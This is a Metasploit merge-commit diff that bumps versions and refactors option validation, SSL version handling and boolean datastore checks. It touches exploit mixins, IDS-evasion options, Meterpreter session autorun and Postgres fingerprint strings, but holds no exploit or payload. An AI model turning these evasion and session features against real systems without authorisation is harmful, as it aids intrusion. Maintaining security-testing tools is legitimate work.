Merge branch 'master' into land-6691-
commit
242ea8d9cd
1
.mailmap
1
.mailmap
|
@ -114,6 +114,7 @@ m-1-k-3 <m-1-k-3@github> Michael Messner <devnull@s3cur1ty.de>
|
|||
Meatballs1 <Meatballs1@github> <eat_meatballs@hotmail.co.uk>
|
||||
Meatballs1 <Meatballs1@github> <Meatballs1@users.noreply.github.com>
|
||||
mubix <mubix@github> Rob Fuller <jd.mubix@gmail.com>
|
||||
net-ninja <net-ninja@github.com> Steven Seeley <steventhomasseeley@gmail.com>
|
||||
nevdull77 <nevdull77@github> Patrik Karlsson <patrik@cqure.net>
|
||||
nmonkee <nmonkee@github> nmonkee <dave@northern-monkee.co.uk>
|
||||
nullbind <nullbind@github> nullbind <scott.sutherland@nullbind.com>
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
PATH
|
||||
remote: .
|
||||
specs:
|
||||
metasploit-framework (4.11.16)
|
||||
metasploit-framework (4.11.18)
|
||||
actionpack (>= 4.0.9, < 4.1.0)
|
||||
activerecord (>= 4.0.9, < 4.1.0)
|
||||
activesupport (>= 4.0.9, < 4.1.0)
|
||||
|
@ -13,7 +13,7 @@ PATH
|
|||
metasploit-concern
|
||||
metasploit-credential (= 1.1.0)
|
||||
metasploit-model (= 1.1.0)
|
||||
metasploit-payloads (= 1.1.2)
|
||||
metasploit-payloads (= 1.1.3)
|
||||
metasploit_data_models (= 1.3.0)
|
||||
msgpack
|
||||
network_interface (~> 0.0.1)
|
||||
|
@ -124,7 +124,7 @@ GEM
|
|||
activemodel (>= 4.0.9, < 4.1.0)
|
||||
activesupport (>= 4.0.9, < 4.1.0)
|
||||
railties (>= 4.0.9, < 4.1.0)
|
||||
metasploit-payloads (1.1.2)
|
||||
metasploit-payloads (1.1.3)
|
||||
metasploit_data_models (1.3.0)
|
||||
activerecord (>= 4.0.9, < 4.1.0)
|
||||
activesupport (>= 4.0.9, < 4.1.0)
|
||||
|
|
Binary file not shown.
|
@ -30,7 +30,7 @@ module Metasploit
|
|||
end
|
||||
end
|
||||
|
||||
VERSION = "4.11.16"
|
||||
VERSION = "4.11.18"
|
||||
MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i }
|
||||
PRERELEASE = 'dev'
|
||||
HASH = get_hash
|
||||
|
|
|
@ -27,7 +27,7 @@ class Config < Hash
|
|||
# @return [String] the base configuration directory
|
||||
def self.get_config_root
|
||||
|
||||
# Use MSFCFGDIR environment variable first. See feature request #5797
|
||||
# Use MSF_CFGROOT_CONFIG environment variable first.
|
||||
val = Rex::Compat.getenv('MSF_CFGROOT_CONFIG')
|
||||
if (val and File.directory?(val))
|
||||
return val
|
||||
|
|
|
@ -216,7 +216,7 @@ class CommandShell
|
|||
end
|
||||
end
|
||||
|
||||
if (datastore['InitialAutoRunScript'] && datastore['InitialAutoRunScript'].empty? == false)
|
||||
if datastore['InitialAutoRunScript'] && !datastore['InitialAutoRunScript'].empty?
|
||||
args = Shellwords.shellwords( datastore['InitialAutoRunScript'] )
|
||||
print_status("Session ID #{sid} (#{tunnel_to_s}) processing InitialAutoRunScript '#{datastore['InitialAutoRunScript']}'")
|
||||
execute_script(args.shift, *args)
|
||||
|
|
|
@ -37,13 +37,13 @@ module MeterpreterOptions
|
|||
framework.sessions.schedule Proc.new {
|
||||
|
||||
# Configure unicode encoding before loading stdapi
|
||||
session.encode_unicode = ( datastore['EnableUnicodeEncoding'] ? true : false )
|
||||
session.encode_unicode = datastore['EnableUnicodeEncoding']
|
||||
|
||||
session.init_ui(self.user_input, self.user_output)
|
||||
|
||||
valid = true
|
||||
|
||||
if datastore['AutoVerifySession'] == true
|
||||
if datastore['AutoVerifySession']
|
||||
if not session.is_valid_session?(datastore['AutoVerifySessionTimeout'].to_i)
|
||||
print_error("Meterpreter session #{session.sid} is not valid and will be closed")
|
||||
valid = false
|
||||
|
@ -52,7 +52,7 @@ module MeterpreterOptions
|
|||
|
||||
if valid
|
||||
|
||||
if datastore['AutoLoadStdapi'] == true
|
||||
if datastore['AutoLoadStdapi']
|
||||
|
||||
session.load_stdapi
|
||||
|
||||
|
@ -72,7 +72,7 @@ module MeterpreterOptions
|
|||
end
|
||||
|
||||
[ 'InitialAutoRunScript', 'AutoRunScript' ].each do |key|
|
||||
if (datastore[key].empty? == false)
|
||||
if !datastore[key].empty?
|
||||
args = Shellwords.shellwords( datastore[key] )
|
||||
print_status("Session ID #{session.sid} (#{session.tunnel_to_s}) processing #{key} '#{datastore[key]}'")
|
||||
session.execute_script(args.shift, *args)
|
||||
|
|
|
@ -84,7 +84,7 @@ module VncInjectOptions
|
|||
print_status("Local TCP relay started.")
|
||||
|
||||
# If the AUTOVNC flag is set, launch VNC viewer.
|
||||
if (datastore['AUTOVNC'] == true)
|
||||
if datastore['AUTOVNC']
|
||||
if (session.autovnc(datastore['ViewOnly']))
|
||||
print_status("Launched vncviewer.")
|
||||
else
|
||||
|
|
|
@ -44,7 +44,7 @@ module Auxiliary::HttpCrawler
|
|||
OptString.new('BasicAuthPass', [false, 'The HTTP password to specify for basic authentication']),
|
||||
OptString.new('HTTPAdditionalHeaders', [false, "A list of additional headers to send (separated by \\x01)"]),
|
||||
OptString.new('HTTPCookie', [false, "A HTTP cookie header to send with each request"]),
|
||||
OptEnum.new('SSLVersion', [ false, 'Specify the version of SSL that should be used', 'Auto', ['Auto', 'SSL2', 'SSL23', 'SSL3', 'TLS1']]),
|
||||
Opt::SSLVersion
|
||||
], self.class
|
||||
)
|
||||
|
||||
|
|
|
@ -13,6 +13,7 @@ class DataStore < Hash
|
|||
# Initializes the data store's internal state.
|
||||
#
|
||||
def initialize()
|
||||
@options = Hash.new
|
||||
@imported = Hash.new
|
||||
@imported_by = Hash.new
|
||||
end
|
||||
|
@ -26,6 +27,14 @@ class DataStore < Hash
|
|||
@imported[k] = false
|
||||
@imported_by[k] = nil
|
||||
|
||||
opt = @options[k]
|
||||
unless opt.nil?
|
||||
unless opt.valid?(v)
|
||||
raise OptionValidateError.new(["Value '#{v}' is not valid for option '#{k}'#{['', ', try harder'].sample}"])
|
||||
end
|
||||
v = opt.normalize(v)
|
||||
end
|
||||
|
||||
super(k,v)
|
||||
end
|
||||
|
||||
|
@ -65,17 +74,11 @@ class DataStore < Hash
|
|||
# all of the supplied options
|
||||
#
|
||||
def import_options(options, imported_by = nil, overwrite = false)
|
||||
options.each_option { |name, opt|
|
||||
# If there's already a value defined for this option, then skip it
|
||||
# and don't import it.
|
||||
next if self.has_key?(name) and overwrite == false
|
||||
|
||||
# If the option has a default value, import it, but only if the
|
||||
# datastore doesn't already have a value set for it.
|
||||
if ((opt.default != nil) and (overwrite or self[name] == nil))
|
||||
import_option(name, opt.default.to_s, true, imported_by)
|
||||
options.each_option do |name, opt|
|
||||
if self[name].nil? || overwrite
|
||||
import_option(name, opt.default, true, imported_by, opt)
|
||||
end
|
||||
}
|
||||
end
|
||||
end
|
||||
|
||||
#
|
||||
|
@ -124,13 +127,14 @@ class DataStore < Hash
|
|||
#
|
||||
def import_options_from_hash(option_hash, imported = true, imported_by = nil)
|
||||
option_hash.each_pair { |key, val|
|
||||
import_option(key, val.to_s, imported, imported_by)
|
||||
import_option(key, val, imported, imported_by)
|
||||
}
|
||||
end
|
||||
|
||||
def import_option(key, val, imported=true, imported_by=nil)
|
||||
def import_option(key, val, imported=true, imported_by=nil, option=nil)
|
||||
self.store(key, val)
|
||||
|
||||
@options[key] = option
|
||||
@imported[key] = imported
|
||||
@imported_by[key] = imported_by
|
||||
end
|
||||
|
|
|
@ -163,14 +163,4 @@ class Msf::DBManager
|
|||
|
||||
true
|
||||
end
|
||||
|
||||
# Mainly, it's Ruby 1.9.1 that cause a lot of problems now, along with Ruby 1.8.6.
|
||||
# Ruby 1.8.7 actually seems okay, but why tempt fate? Let's say 1.9.3 and beyond.
|
||||
def warn_about_rubies
|
||||
if ::RUBY_VERSION =~ /^1\.9\.[012]($|[^\d])/
|
||||
$stderr.puts "**************************************************************************************"
|
||||
$stderr.puts "Metasploit requires at least Ruby 1.9.3. For an easy upgrade path, see https://rvm.io/"
|
||||
$stderr.puts "**************************************************************************************"
|
||||
end
|
||||
end
|
||||
end
|
||||
|
|
|
@ -537,7 +537,7 @@ protected
|
|||
#
|
||||
def find_context_key(buf, badchars, state)
|
||||
# Make sure our context information file is sane
|
||||
if File.exists?(datastore['ContextInformationFile']) == false
|
||||
if !File.exists?(datastore['ContextInformationFile'])
|
||||
raise NoKeyError, "A context information file must specified when using context encoding", caller
|
||||
end
|
||||
|
||||
|
|
|
@ -1506,7 +1506,7 @@ protected
|
|||
# required when wanting to support context keyed encoding
|
||||
#
|
||||
def define_context_encoding_reqs(reqs)
|
||||
return if datastore['EnableContextEncoding'] != true
|
||||
return unless datastore['EnableContextEncoding']
|
||||
|
||||
# At present, we don't support any automatic methods of obtaining
|
||||
# context information. In the future, we might support obtaining
|
||||
|
|
|
@ -50,7 +50,7 @@ module Exploit::Remote::HttpClient
|
|||
OptString.new('USERNAME', [false, 'The HTTP username to specify for authentication', '']),
|
||||
OptString.new('PASSWORD', [false, 'The HTTP password to specify for authentication', '']),
|
||||
OptBool.new('DigestAuthIIS', [false, 'Conform to IIS, should work for most servers. Only set to false for non-IIS servers', true]),
|
||||
OptEnum.new('SSLVersion', [ false, 'Specify the version of SSL that should be used', 'Auto', ['Auto', 'SSL2', 'SSL3', 'TLS1']]),
|
||||
Opt::SSLVersion,
|
||||
OptBool.new('FingerprintCheck', [ false, 'Conduct a pre-exploit fingerprint verification', true]),
|
||||
OptString.new('DOMAIN', [ true, 'The domain to use for windows authentification', 'WORKSTATION']),
|
||||
OptInt.new('HttpClientTimeout', [false, 'HTTP connection and receive timeout'])
|
||||
|
@ -85,7 +85,7 @@ module Exploit::Remote::HttpClient
|
|||
#
|
||||
# Remaining evasions to implement
|
||||
#
|
||||
# OptBool.new('HTTP::chunked', [false, 'Enable chunking of HTTP request via "Transfer-Encoding: chunked"', 'false']),
|
||||
# OptBool.new('HTTP::chunked', [false, 'Enable chunking of HTTP request via "Transfer-Encoding: chunked"', false]),
|
||||
# OptInt.new('HTTP::junk_pipeline', [true, 'Insert the specified number of junk pipeline requests', 0]),
|
||||
], self.class
|
||||
)
|
||||
|
|
|
@ -32,9 +32,9 @@ module Exploit::Remote::HttpServer
|
|||
|
||||
register_evasion_options(
|
||||
[
|
||||
OptBool.new('HTTP::chunked', [false, 'Enable chunking of HTTP responses via "Transfer-Encoding: chunked"', 'false']),
|
||||
OptBool.new('HTTP::header_folding', [false, 'Enable folding of HTTP headers', 'false']),
|
||||
OptBool.new('HTTP::junk_headers', [false, 'Enable insertion of random junk HTTP headers', 'false']),
|
||||
OptBool.new('HTTP::chunked', [false, 'Enable chunking of HTTP responses via "Transfer-Encoding: chunked"', false]),
|
||||
OptBool.new('HTTP::header_folding', [false, 'Enable folding of HTTP headers', false]),
|
||||
OptBool.new('HTTP::junk_headers', [false, 'Enable insertion of random junk HTTP headers', false]),
|
||||
OptEnum.new('HTTP::compression', [false, 'Enable compression of HTTP responses via content encoding', 'none', ['none','gzip','deflate']]),
|
||||
OptString.new('HTTP::server_name', [true, 'Configures the Server header of all outgoing replies', 'Apache'])
|
||||
], Exploit::Remote::HttpServer
|
||||
|
@ -86,7 +86,7 @@ module Exploit::Remote::HttpServer
|
|||
# set.
|
||||
#
|
||||
def use_zlib
|
||||
if (!Rex::Text.zlib_present? and datastore['HTTP::compression'] == true)
|
||||
if !Rex::Text.zlib_present? && datastore['HTTP::compression']
|
||||
raise RuntimeError, "zlib support was not detected, yet the HTTP::compression option was set. Don't do that!"
|
||||
end
|
||||
end
|
||||
|
@ -530,16 +530,16 @@ module Exploit::Remote::HttpServer
|
|||
response.compress = datastore['HTTP::compression']
|
||||
end
|
||||
|
||||
if (datastore['HTTP::chunked'] == true)
|
||||
if datastore['HTTP::chunked']
|
||||
response.auto_cl = false
|
||||
response.transfer_chunked = true
|
||||
end
|
||||
|
||||
if (datastore['HTTP::header_folding'] == true)
|
||||
if datastore['HTTP::header_folding']
|
||||
response.headers.fold = 1
|
||||
end
|
||||
|
||||
if (datastore['HTTP::junk_headers'] == true)
|
||||
if datastore['HTTP::junk_headers']
|
||||
response.headers.junk_headers = 1
|
||||
end
|
||||
|
||||
|
|
|
@ -292,6 +292,8 @@ module Exploit::Remote::Postgres
|
|||
when "Fauth.c:L302:Rauth_failed" ; return {:preauth => "9.1.6"} # Bad password, good database
|
||||
when "Fpostinit.c:L718:RInitPostgres" ; return {:preauth => "9.1.6"} # Good creds, non-existent but allowed database
|
||||
when "Fauth.c:L483:RClientAuthentication" ; return {:preauth => "9.1.6"} # Bad user
|
||||
when "Fauth.c:L285:Rauth_failed" ; return {:preauth => "9.4.1-5"} # Bad creds, good database
|
||||
when "Fauth.c:L481:RClientAuthentication" ; return {:preauth => "9.4.1-5"} # bad user or host
|
||||
|
||||
# Windows
|
||||
|
||||
|
|
|
@ -588,7 +588,7 @@ module Msf
|
|||
if profile.nil?
|
||||
print_status("Browsing directly to the exploit URL is forbidden.")
|
||||
send_not_found(cli)
|
||||
elsif profile[:tried] and datastore['Retries'] == false
|
||||
elsif profile[:tried] && !datastore['Retries']
|
||||
print_status("Target with tag \"#{tag}\" wants to retry the module, not allowed.")
|
||||
send_not_found(cli)
|
||||
else
|
||||
|
|
|
@ -64,7 +64,7 @@ module Msf
|
|||
register_options(
|
||||
[
|
||||
Opt::RHOST,
|
||||
OptInt.new('RPORT', [ true, 'Set the SMB service port', 445])
|
||||
OptPort.new('RPORT', [ true, 'The SMB service port', 445])
|
||||
], Msf::Exploit::Remote::SMB::Client)
|
||||
|
||||
register_autofilter_ports([ 139, 445])
|
||||
|
|
|
@ -31,7 +31,7 @@ module Exploit::Remote::SunRPC
|
|||
|
||||
register_evasion_options(
|
||||
[
|
||||
OptBool.new('ONCRPC::tcp_request_fragmentation', [false, 'Enable fragmentation of TCP ONC/RPC requests', 'false']),
|
||||
OptBool.new('ONCRPC::tcp_request_fragmentation', [false, 'Enable fragmentation of TCP ONC/RPC requests', false]),
|
||||
], Msf::Exploit::Remote::SunRPC
|
||||
)
|
||||
|
||||
|
@ -65,7 +65,7 @@ module Exploit::Remote::SunRPC
|
|||
}
|
||||
)
|
||||
|
||||
if datastore['ONCRPC::tcp_request_fragmentation'] == true
|
||||
if datastore['ONCRPC::tcp_request_fragmentation']
|
||||
self.rpcobj.should_fragment = 1
|
||||
end
|
||||
|
||||
|
|
|
@ -64,7 +64,7 @@ module Exploit::Remote::Tcp
|
|||
register_advanced_options(
|
||||
[
|
||||
OptBool.new('SSL', [ false, 'Negotiate SSL/TLS for outgoing connections', false]),
|
||||
OptEnum.new('SSLVersion', [ false, 'Specify the version of SSL/TLS to be used (TLS and SSL23 are auto-negotiate)', 'TLS1', ['SSL2', 'SSL3', 'SSL23', 'TLS', 'TLS1', 'TLS1.1', 'TLS1.2']]),
|
||||
Opt::SSLVersion,
|
||||
OptEnum.new('SSLVerifyMode', [ false, 'SSL verification method', 'PEER', %W{CLIENT_ONCE FAIL_IF_NO_PEER_CERT NONE PEER}]),
|
||||
OptString.new('SSLCipher', [ false, 'String for SSL cipher - "DHE-RSA-AES256-SHA" or "ADH"']),
|
||||
Opt::Proxies,
|
||||
|
|
|
@ -19,7 +19,6 @@ module Exploit::Remote::TcpServer
|
|||
[
|
||||
OptBool.new('SSL', [ false, 'Negotiate SSL for incoming connections', false]),
|
||||
# SSLVersion is currently unsupported for TCP servers (only supported by clients at the moment)
|
||||
# OptEnum.new('SSLVersion', [ false, 'Specify the version of SSL that should be used', 'TLS1', ['SSL2', 'SSL3', 'TLS1']]),
|
||||
OptPath.new('SSLCert', [ false, 'Path to a custom SSL certificate (default is randomly generated)']),
|
||||
OptAddress.new('SRVHOST', [ true, "The local host to listen on. This must be an address on the local machine or 0.0.0.0", '0.0.0.0' ]),
|
||||
OptPort.new('SRVPORT', [ true, "The local port to listen on.", 8080 ]),
|
||||
|
|
|
@ -38,14 +38,6 @@ class Framework
|
|||
|
||||
Revision = "$Revision$"
|
||||
|
||||
# Repository information
|
||||
RepoRevision = ::Msf::Util::SVN.revision
|
||||
RepoUpdated = ::Msf::Util::SVN.updated
|
||||
RepoUpdatedDays = ::Msf::Util::SVN.days_since_update
|
||||
RepoUpdatedDaysNote = ::Msf::Util::SVN.last_updated_friendly
|
||||
RepoUpdatedDate = ::Msf::Util::SVN.last_updated_date
|
||||
RepoRoot = ::Msf::Util::SVN.root
|
||||
|
||||
# EICAR canary
|
||||
EICARCorrupted = ::Msf::Util::EXE.is_eicar_corrupted?
|
||||
|
||||
|
|
|
@ -266,11 +266,10 @@ class Module
|
|||
end
|
||||
|
||||
#
|
||||
# Returns true if this module is being debugged. The debug flag is set
|
||||
# by setting datastore['DEBUG'] to 1|true|yes
|
||||
# Returns true if this module is being debugged.
|
||||
#
|
||||
def debugging?
|
||||
(datastore['DEBUG'] || '') =~ /^(1|t|y)/i
|
||||
datastore['DEBUG']
|
||||
end
|
||||
|
||||
#
|
||||
|
|
|
@ -60,15 +60,15 @@ module Msf::Module::Deprecated
|
|||
#
|
||||
# @return [void]
|
||||
def print_deprecation_warning
|
||||
print_warning("*"*72)
|
||||
print_warning("*%red"+"The module #{refname} is deprecated!".center(70)+"%clr*")
|
||||
print_warning("*"*90)
|
||||
print_warning("*%red"+"The module #{refname} is deprecated!".center(88)+"%clr*")
|
||||
if deprecation_date
|
||||
print_warning("*"+"It will be removed on or about #{deprecation_date}".center(70)+"*")
|
||||
print_warning("*"+"It will be removed on or about #{deprecation_date}".center(88)+"*")
|
||||
end
|
||||
if replacement_module
|
||||
print_warning("*"+"Use #{replacement_module} instead".center(70)+"*")
|
||||
print_warning("*"+"Use #{replacement_module} instead".center(88)+"*")
|
||||
end
|
||||
print_warning("*"*72)
|
||||
print_warning("*"*90)
|
||||
end
|
||||
|
||||
def init_ui(input = nil, output = nil)
|
||||
|
|
|
@ -14,9 +14,8 @@ module Msf::Module::UI::Message
|
|||
|
||||
def print_prefix
|
||||
prefix = ''
|
||||
if (datastore['TimestampOutput'] =~ /^(t|y|1)/i) || (
|
||||
framework && framework.datastore['TimestampOutput'] =~ /^(t|y|1)/i
|
||||
)
|
||||
if datastore['TimestampOutput'] ||
|
||||
(framework && framework.datastore['TimestampOutput'])
|
||||
prefix << "[#{Time.now.strftime("%Y.%m.%d-%H:%M:%S")}] "
|
||||
|
||||
xn ||= datastore['ExploitNumber']
|
||||
|
|
|
@ -1,21 +1,21 @@
|
|||
module Msf::Module::UI::Message::Verbose
|
||||
# Verbose version of #print_error
|
||||
def vprint_error(msg='')
|
||||
print_error(msg) if datastore['VERBOSE'] || framework.datastore['VERBOSE']
|
||||
print_error(msg) if datastore['VERBOSE'] || (!framework.nil? && framework.datastore['VERBOSE'])
|
||||
end
|
||||
|
||||
# Verbose version of #print_good
|
||||
def vprint_good(msg='')
|
||||
print_good(msg) if datastore['VERBOSE'] || framework.datastore['VERBOSE']
|
||||
print_good(msg) if datastore['VERBOSE'] || (!framework.nil? && framework.datastore['VERBOSE'])
|
||||
end
|
||||
|
||||
# Verbose version of #print_status
|
||||
def vprint_status(msg='')
|
||||
print_status(msg) if datastore['VERBOSE'] || framework.datastore['VERBOSE']
|
||||
print_status(msg) if datastore['VERBOSE'] || (!framework.nil? && framework.datastore['VERBOSE'])
|
||||
end
|
||||
|
||||
# Verbose version of #print_warning
|
||||
def vprint_warning(msg='')
|
||||
print_warning(msg) if datastore['VERBOSE'] || framework.datastore['VERBOSE']
|
||||
print_warning(msg) if datastore['VERBOSE'] || (!framework.nil? && framework.datastore['VERBOSE'])
|
||||
end
|
||||
end
|
||||
|
|
|
@ -147,11 +147,6 @@ module Msf
|
|||
# @param klass [Class<Msf::Module>] The module class
|
||||
# @return [void]
|
||||
def auto_subscribe_module(klass)
|
||||
# If auto-subscribe has been disabled
|
||||
if (framework.datastore['DisableAutoSubscribe'] and
|
||||
framework.datastore['DisableAutoSubscribe'] =~ /^(y|1|t)/)
|
||||
return
|
||||
end
|
||||
|
||||
# If auto-subscription is enabled (which it is by default), figure out
|
||||
# if it subscribes to any particular interfaces.
|
||||
|
|
|
@ -32,10 +32,6 @@ class Msf::Modules::Loader::Directory < Msf::Modules::Loader::Base
|
|||
def each_module_reference_name(path, opts={})
|
||||
whitelist = opts[:whitelist] || []
|
||||
::Dir.foreach(path) do |entry|
|
||||
if entry.downcase == '.svn'
|
||||
next
|
||||
end
|
||||
|
||||
full_entry_path = ::File.join(path, entry)
|
||||
type = entry.singularize
|
||||
|
||||
|
|
|
@ -51,6 +51,13 @@ module Msf
|
|||
Msf::OptPort.new(__method__.to_s, [ required, desc, default ])
|
||||
end
|
||||
|
||||
# @return [OptEnum]
|
||||
def self.SSLVersion
|
||||
Msf::OptEnum.new('SSLVersion', [ false,
|
||||
'Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate)', 'Auto',
|
||||
['Auto', 'SSL2', 'SSL3', 'SSL23', 'TLS', 'TLS1', 'TLS1.1', 'TLS1.2']])
|
||||
end
|
||||
|
||||
# These are unused but remain for historical reasons
|
||||
class << self
|
||||
alias builtin_chost CHOST
|
||||
|
@ -69,6 +76,7 @@ module Msf
|
|||
Proxies = Proxies()
|
||||
RHOST = RHOST()
|
||||
RPORT = RPORT()
|
||||
SSLVersion = SSLVersion()
|
||||
end
|
||||
|
||||
end
|
||||
|
|
|
@ -7,24 +7,17 @@ module Msf
|
|||
# Network port option.
|
||||
#
|
||||
###
|
||||
class OptPort < OptBase
|
||||
class OptPort < OptInt
|
||||
def type
|
||||
return 'port'
|
||||
end
|
||||
|
||||
def normalize(value)
|
||||
value.to_i
|
||||
end
|
||||
|
||||
def valid?(value)
|
||||
return false if empty_required_value?(value)
|
||||
|
||||
if ((value != nil and value.to_s.empty? == false) and
|
||||
((value.to_s.match(/^\d+$/) == nil or value.to_i < 0 or value.to_i > 65535)))
|
||||
return false
|
||||
if !required? and value.to_s.empty?
|
||||
super
|
||||
else
|
||||
super && normalize(value) <= 65535 && normalize(value) >= 0
|
||||
end
|
||||
|
||||
return super
|
||||
end
|
||||
end
|
||||
|
||||
|
|
|
@ -13,7 +13,7 @@ class OptRaw < OptBase
|
|||
end
|
||||
|
||||
def normalize(value)
|
||||
if (value =~ /^file:(.*)/)
|
||||
if (value.to_s =~ /^file:(.*)/)
|
||||
path = $1
|
||||
begin
|
||||
value = File.read(path)
|
||||
|
|
|
@ -29,7 +29,7 @@ class OptRegexp < OptBase
|
|||
|
||||
def normalize(value)
|
||||
return nil if value.nil?
|
||||
return Regexp.compile(value)
|
||||
return Regexp.compile(value.to_s)
|
||||
end
|
||||
|
||||
def display_value(value)
|
||||
|
|
|
@ -13,7 +13,7 @@ class OptString < OptBase
|
|||
end
|
||||
|
||||
def normalize(value)
|
||||
if (value =~ /^file:(.*)/)
|
||||
if (value.to_s =~ /^file:(.*)/)
|
||||
path = $1
|
||||
begin
|
||||
value = File.read(path)
|
||||
|
|
|
@ -10,7 +10,7 @@ module Msf::Payload::Ruby
|
|||
[
|
||||
# Since space restrictions aren't really a problem, default this to
|
||||
# true.
|
||||
Msf::OptBool.new('PrependFork', [ false, "Start the payload in its own process via fork or popen", "true" ])
|
||||
Msf::OptBool.new('PrependFork', [ false, "Start the payload in its own process via fork or popen", true ])
|
||||
]
|
||||
)
|
||||
end
|
||||
|
|
|
@ -28,7 +28,7 @@ module Msf::Payload::Windows::PrependMigrate
|
|||
# for discussion.
|
||||
#
|
||||
def prepend_migrate?
|
||||
!!(datastore['PrependMigrate'] && datastore['PrependMigrate'].to_s.downcase == 'true')
|
||||
datastore['PrependMigrate']
|
||||
end
|
||||
|
||||
#
|
||||
|
|
|
@ -3,36 +3,6 @@
|
|||
# Provides some sanity checks against the ruby build and version
|
||||
#
|
||||
|
||||
# Check for the broken pack/unpack in OS X 10.4.x
|
||||
if ([1].pack('n') == "\x01\x00")
|
||||
$stderr.puts "*** This ruby build has a broken pack/unpack implementation! "
|
||||
|
||||
if (RUBY_PLATFORM =~ /darwin/)
|
||||
$stderr.puts " Apple shipped a broken version of ruby with the 10.4.x "
|
||||
$stderr.puts " release. Please install ruby from source, or use one of "
|
||||
$stderr.puts " the free package managers to obtain a working ruby build."
|
||||
end
|
||||
|
||||
exit(0)
|
||||
end
|
||||
|
||||
# Check for ruby 1.8.2 as the minimal supported version
|
||||
if (RUBY_VERSION =~ /^1\.[0-7]\./ or RUBY_VERSION =~ /^1\.8\.[0-1]$/)
|
||||
$stderr.puts "*** This version of ruby is not supported, please upgrade to 1.8.7+"
|
||||
exit(0)
|
||||
end
|
||||
|
||||
# Check for ruby 1.9.0 and throw a big nasty warning
|
||||
if (RUBY_VERSION =~ /^1\.9\.0/)
|
||||
$stderr.puts "*** Ruby 1.9.0 is not supported, please upgrade to Ruby 1.9.3 or newer."
|
||||
exit(0)
|
||||
end
|
||||
|
||||
# Check for ruby 1.9.1 and throw a warning
|
||||
if (RUBY_VERSION =~ /^1\.9\.1/)
|
||||
$stderr.puts "*** Ruby 1.9.1 is not supported, please upgrade to Ruby 1.9.3 or newer."
|
||||
end
|
||||
|
||||
if(RUBY_PLATFORM == 'java')
|
||||
require 'socket'
|
||||
s = Socket.new(::Socket::AF_INET, ::Socket::SOCK_STREAM, ::Socket::IPPROTO_TCP)
|
||||
|
@ -56,56 +26,3 @@ rescue ::LoadError
|
|||
$stderr.puts "*** The ruby-openssl library is not installed, many features will be disabled!"
|
||||
$stderr.puts "*** Examples: Meterpreter, SSL Sockets, SMB/NTLM Authentication, and more"
|
||||
end
|
||||
|
||||
|
||||
#
|
||||
# Check for the ugly 1.8.7 short-named constants bug
|
||||
#
|
||||
|
||||
class ConstBugTestA
|
||||
Const = 'A'
|
||||
def test
|
||||
Const == 'A'
|
||||
end
|
||||
end
|
||||
|
||||
ConstBugTestC = ConstBugTestA.dup
|
||||
|
||||
class ConstBugTestB < ConstBugTestC
|
||||
Const = 'B'
|
||||
end
|
||||
|
||||
def ruby_187_const_bug
|
||||
bugged = false
|
||||
|
||||
begin
|
||||
ConstBugTestA.new.test()
|
||||
ConstBugTestB.new.test()
|
||||
rescue ::NameError
|
||||
bugged = true
|
||||
end
|
||||
|
||||
bugged
|
||||
end
|
||||
|
||||
if(ruby_187_const_bug())
|
||||
$stderr.puts ""
|
||||
$stderr.puts "***********************************************************************"
|
||||
$stderr.puts "*** *"
|
||||
$stderr.puts "*** This version of the Ruby interpreter contains a serious bug *"
|
||||
$stderr.puts "*** related to short-named constants, we strongly recommend that you *"
|
||||
$stderr.puts "*** switch to a fixed version. Unfortunately, some Linux distros have *"
|
||||
$stderr.puts "*** backported the buggy patch into 1.8.6, so you may need to contact *"
|
||||
$stderr.puts "*** your vendor and ask them to review the URL below. *"
|
||||
$stderr.puts "*** *"
|
||||
$stderr.puts "*** Alternatively, you can download, build, and install the latest *"
|
||||
$stderr.puts "*** stable snapshot of Ruby from the following URL: *"
|
||||
$stderr.puts "*** - http://www.ruby-lang.org/ *"
|
||||
$stderr.puts "*** *"
|
||||
$stderr.puts "*** For more information, please see the following URL: *"
|
||||
$stderr.puts "*** - https://bugs.launchpad.net/bugs/282302 *"
|
||||
$stderr.puts "*** *"
|
||||
$stderr.puts "***********************************************************************"
|
||||
$stderr.puts ""
|
||||
end
|
||||
|
||||
|
|
|
@ -2178,10 +2178,15 @@ class Core
|
|||
return true
|
||||
end
|
||||
|
||||
if append
|
||||
datastore[name] = datastore[name] + value
|
||||
else
|
||||
datastore[name] = value
|
||||
begin
|
||||
if append
|
||||
datastore[name] = datastore[name] + value
|
||||
else
|
||||
datastore[name] = value
|
||||
end
|
||||
rescue OptionValidateError => e
|
||||
print_error(e.message)
|
||||
elog(e.message)
|
||||
end
|
||||
|
||||
print_line("#{name} => #{datastore[name]}")
|
||||
|
@ -2193,7 +2198,6 @@ class Core
|
|||
# @param str [String] the string currently being typed before tab was hit
|
||||
# @param words [Array<String>] the previously completed words on the command line. words is always
|
||||
# at least 1 when tab completion has reached this stage since the command itself has been completed
|
||||
|
||||
def cmd_set_tabs(str, words)
|
||||
|
||||
# A value has already been specified
|
||||
|
@ -2837,16 +2841,8 @@ class Core
|
|||
# Returns the revision of the framework and console library
|
||||
#
|
||||
def cmd_version(*args)
|
||||
svn_console_version = "$Revision: 15168 $"
|
||||
svn_metasploit_version = Msf::Framework::Revision.match(/ (.+?) \$/)[1] rescue nil
|
||||
if svn_metasploit_version
|
||||
print_line("Framework: #{Msf::Framework::Version}.#{svn_metasploit_version}")
|
||||
else
|
||||
print_line("Framework: #{Msf::Framework::Version}")
|
||||
end
|
||||
print_line("Console : #{Msf::Framework::Version}.#{svn_console_version.match(/ (.+?) \$/)[1]}")
|
||||
|
||||
return true
|
||||
print_line("Framework: #{Msf::Framework::Version}")
|
||||
print_line("Console : #{Msf::Framework::Version}")
|
||||
end
|
||||
|
||||
def cmd_grep_help
|
||||
|
@ -3523,7 +3519,7 @@ class Core
|
|||
next if not o
|
||||
|
||||
# handle a search string, search deep
|
||||
if(
|
||||
if (
|
||||
not regex or
|
||||
o.name.match(regex) or
|
||||
o.description.match(regex) or
|
||||
|
@ -3537,7 +3533,7 @@ class Core
|
|||
mod_opt_keys = o.options.keys.map { |x| x.downcase }
|
||||
|
||||
opts.each do |opt,val|
|
||||
if mod_opt_keys.include?(opt.downcase) == false or (val != nil and o.datastore[opt] != val)
|
||||
if !mod_opt_keys.include?(opt.downcase) || (val != nil && o.datastore[opt] != val)
|
||||
show = false
|
||||
end
|
||||
end
|
||||
|
|
|
@ -154,8 +154,7 @@ class Exploit
|
|||
else
|
||||
# If we didn't run a payload handler for this exploit it doesn't
|
||||
